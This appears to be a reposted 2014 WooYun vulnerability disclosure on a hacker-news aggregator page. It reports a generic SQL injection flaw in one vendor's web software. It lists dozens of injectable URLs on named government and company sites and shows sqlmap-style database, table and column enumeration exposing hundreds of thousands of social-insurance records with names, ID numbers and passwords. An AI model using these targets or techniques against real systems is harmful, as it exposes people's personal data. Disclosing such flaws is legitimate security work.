记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

安徽某网络技术有限公司程序存在通用型SQL注入漏洞(100W+的社保账户信息泄露)

2014-05-25 20:25

技术支持:安徽科艾网络技术有限公司

漏洞站点:

http://www.hnldj.gov.cn/ 56W+的社保人员信息

http://www.hngwyj.gov.cn/

http://www.ccccah.cn/

http://www.yiyi-group.com/

http://www.xjjwhg.com/

... ...

注入点:

站点1

http://www.hnldj.gov.cn/new/zwgk.php?class_id=115

http://www.hnldj.gov.cn/new/ztzl.php?class_id=3396

http://www.hnldj.gov.cn/new/News_Text.php?id=3709&class_id=168

http://www.hnldj.gov.cn/new/ztzl_Text.php?class_id=3396&id=801

http://www.hnldj.gov.cn/red/ztzl.php?class_id=3396

http://www.hnldj.gov.cn/red/gdzl.php?style=3&lanmu=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EB%A1%A2%CA%A1%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD

http://www.hnldj.gov.cn/red/nmg.php?class_id=74

http://www.hnldj.gov.cn/red/zcgl.php?class_id=70

http://www.hnldj.gov.cn/red/ldjc.php?class_id=66

http://www.hnldj.gov.cn/red/zynl.php?class_id=62

http://www.hnldj.gov.cn/red/rlzy.php?class_id=34

http://www.hnldj.gov.cn/red/bszn.php?class_id=46

http://www.hnldj.gov.cn/red/jyzd.php?class_id=42

http://www.hnldj.gov.cn/red/zwgk.php?class_id=10

http://www.hnldj.gov.cn/red/shbx.php?class_id=38

http://www.hnldj.gov.cn/red/ztzl_text.php?id=799&class_id=3396

站点2

http://www.hngwyj.gov.cn/downfileclassify.php?classify=1

http://www.hngwyj.gov.cn/arccotent.php?id=1245

站点3

http://www.ccccah.cn/News_Text.php?id=95&class_id=112

http://www.ccccah.cn/gcyj.php?class_id=9

http://www.ccccah.cn/News_Text.php?class_id=13&id=699

站点4

http://www.yiyi-group.com/popbase.php?base_id=3356&id=18

http://www.yiyi-group.com/member_popbase.php?base_id=3245&id=43

http://www.yiyi-group.com/rlzy_popbase.php?id=47

http://www.yiyi-group.com/xmhz_popbase.php?base_id=3349&id=30

站点5

http://www.xjjwhg.com/model3.php?news_id=292

http://www.xjjwhg.com/model2.php?category_id=2&category_value=10

漏洞证明:

以站点1为例,泄露100W+的敏感信息:

当前数据库:

web server operating system: Windows 2008

web application technology: Microsoft IIS 7.5, ASP.NET

back-end DBMS: MySQL 5.0.11

current database: 'hnrllb'



数据库包含的表:

Database: hnrllb

[12 tables]

+-------------+

| admin |

| base |

| class |

| com_ledger |

| menzhen |

| message |

| per_account |

| per_ybzh |

| photo |

| temp |

| ypxx |

| ztzl |

+-------------+



看下per_account有哪些字段:

Table: per_account

[14 columns]

+----------+--------------+

| Column | Type |

+----------+--------------+

| no | varchar(255) |

| AAE002 | varchar(255) |

| birth | varchar(255) |

| card_id | varchar(255) |

| GRZHBYJZ | varchar(255) |

| name | varchar(255) |

| sex | varchar(255) |

| YBBYSR | varchar(255) |

| YBBYZC | varchar(255) |

| YBLJCC | varchar(255) |

| YBLJJF | varchar(255) |

| YLGRJF | varchar(255) |

| YLLJCC | varchar(255) |

| YLLJYS | varchar(255) |

+----------+--------------+



per_account有60W+的信息:

Database: hnrllb

+-------------+---------+

| Table | Entries |

+-------------+---------+

| per_account | 606436 |

+-------------+---------+



再看看menzhen:

Table: menzhen

[9 columns]

+------------+--------------+

| Column | Type |

+------------+--------------+

| card_id | varchar(20) |

| Community | varchar(100) |

| end_time | varchar(20) |

| hospital | varchar(100) |

| name | varchar(20) |

| num | varchar(20) |

| person_no | varchar(20) |

| psd | varchar(20) |

| start_time | varchar(20) |

+------------+--------------+



menzhen有name,psd等账户信息共56W+:

Database: hnrllb

+---------+---------+

| Table | Entries |

+---------+---------+

| menzhen | 563121 |

+---------+---------+



修复方案:

您懂!

知识来源: www.wooyun.org/bugs/wooyun-2014-051912

阅读:113273 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“安徽某网络技术有限公司程序存在通用型SQL注入漏洞(100W+的社保账户信息泄露)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云